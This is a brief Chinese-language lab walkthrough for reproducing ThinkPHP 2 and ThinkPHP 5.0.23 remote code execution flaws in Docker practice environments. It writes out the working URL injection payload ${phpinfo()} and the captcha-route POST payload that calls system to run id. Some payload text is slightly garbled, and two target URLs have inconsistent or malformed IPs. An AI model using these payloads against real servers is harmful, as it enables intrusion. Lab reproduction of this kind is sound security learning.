1.对ThinkPHP2--RCE进行漏洞复现
进入2-rce后运行此靶场 docker-compose up -d
查看启动环境 docker ps
在浏览器打开IP+端口8080 , thinkphp路由的格式是分组/模块/操作名/参数
在url后+/index.php?s=a/a/a/${phpinfo()} ,运行后发现复现成功
中间参数更改为:system(whoami) 我们发现系统发生错误
随后关闭靶场环境
2.
对ThinkPHP5.0.23RCE进行漏洞复现;
运行此靶场 docker-compose up -d
查看启动环境 docker ps
访问网页寻找漏洞点
http://38.6.177.50/:8080/index.php?s=captcha
在ThinkPHP框架中,http://38.66.177.50:8080/index.php?s=captcha 这个URL通常用于访问一个生成验证码图片的页面。这里的URL参数 s=captcha 指定了要执行的模块和操作:
s 通常代表模块(Module)和操作(Action)的组合。在ThinkPHP中,s 参数通常用于路由到特定的控制器方法。
captcha 指的是验证码模块或操作。在ThinkPHP中,captcha 通常是一个内置的功能,用于生成和验证验证码。在ThinkPHP中,我们可以通过配置来定制验证码的样式、字符集、长度等属性。同时,也可以在表单验证时使用这个验证码来确保用户输入的是正确的验证码在Hackber,POST上传
_method= construct&filter[l=system&method=get&serverREQUEST METHOD]=id
随后关闭容器 docker-compose down